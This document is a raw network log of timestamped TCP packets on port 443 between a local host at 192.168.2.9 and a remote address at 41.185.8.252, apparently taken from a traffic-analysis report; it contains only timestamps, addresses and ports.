                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.658346891 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.658391953 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.804649115 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.804697037 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.804846048 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.804864883 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.804946899 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.810617924 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.810638905 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.810758114 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.810771942 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.810827971 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.817487001 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.817502975 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.817662954 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.817681074 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.817739964 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.824362040 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.824383020 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.824516058 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.824529886 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.824587107 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.830331087 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.830348969 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.830491066 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.830508947 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.830594063 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.837949038 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.837971926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.838051081 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.838068962 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.838140965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.843592882 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.843610048 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.843696117 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.843705893 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.843750954 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.850517035 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.850541115 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.850604057 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.850613117 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.850684881 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.850684881 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.997107029 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.997134924 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.997231960 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.997252941 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.997308969 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.003056049 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.003076077 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.003139019 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.003146887 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.003201008 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.009856939 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.009922981 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.009953976 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.009962082 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.009988070 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.010025024 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.016772985 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.016798019 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.016846895 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.016855001 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.016917944 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.016917944 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.022783995 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.022803068 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.022876978 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.022891998 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.022953987 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030102968 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030121088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030215979 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030224085 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030308962 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036112070 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036134005 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036233902 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036241055 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036303043 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.042951107 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043009996 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043040037 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043051004 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043097973 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043119907 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189097881 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189146996 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189184904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189199924 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189256907 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.195965052 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.195983887 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196043968 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196052074 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196094036 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196154118 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202006102 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202023983 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202116966 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202130079 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202184916 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209095955 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209119081 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209187031 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209194899 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209249973 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215691090 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215713024 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215771914 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215790033 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215816021 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215846062 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222091913 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222110033 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222208977 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222217083 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222250938 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222275019 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229234934 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229278088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229310989 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229319096 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229351044 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229383945 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235089064 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235110998 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235169888 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235177994 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235234976 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381324053 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381350040 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381488085 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381515980 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381591082 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388148069 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388165951 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388230085 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388246059 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388277054 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388298988 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394156933 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394176960 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394278049 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394289017 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394365072 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401073933 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401098013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401247025 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401257992 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401313066 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408194065 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408211946 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408271074 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408277988 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408323050 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408384085 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414243937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414262056 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414335012 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414343119 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414400101 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421160936 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421178102 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421252966 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421263933 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421308994 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.427185059 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.427206993 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.427304029 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.427316904 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.427372932 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.573450089 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.573476076 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.573546886 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.573565006 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.573586941 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.573611975 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.580219030 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.580315113 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.580374002 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.580383062 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.580411911 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.580442905 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.587008953 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.587080002 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.587116957 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.587150097 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.587166071 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.589167118 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.593034029 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.593055964 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.593195915 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.593234062 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.593338966 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.599971056 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.599991083 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.600128889 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.600151062 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.600219965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.606384993 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.606405973 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.606503010 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.606515884 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.606549978 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.606561899 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.613229036 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.613249063 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.613360882 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.613374949 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.613428116 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.620096922 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.620156050 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.620198965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.620213032 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.620285988 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.766371965 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.766402960 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.766495943 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.766518116 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.766544104 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.766561985 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.772639036 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.772664070 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.772804976 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.772819042 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.772870064 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.780627012 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.780646086 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.780736923 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.780755997 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.780798912 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.785768986 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.785788059 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.785911083 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.785923004 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.786025047 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.793548107 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.793576002 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.793709040 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.793721914 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.793812990 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.799041033 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.799057007 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.799212933 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.799230099 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.799297094 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.805706978 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.805727005 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.805828094 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.805849075 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.805896997 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.811788082 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.811806917 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.811933994 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.811954021 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.812007904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.958349943 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.958378077 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.958431005 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.958445072 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.958486080 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.958523989 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.964458942 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.964479923 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.964559078 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.964569092 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.964591026 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.964617014 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.971247911 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.971267939 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.971365929 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.971379042 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.971442938 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.971489906 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.978101015 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.978125095 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.978266001 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.978291988 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.978343964 CET49707443192.168.2.941.185.8.252
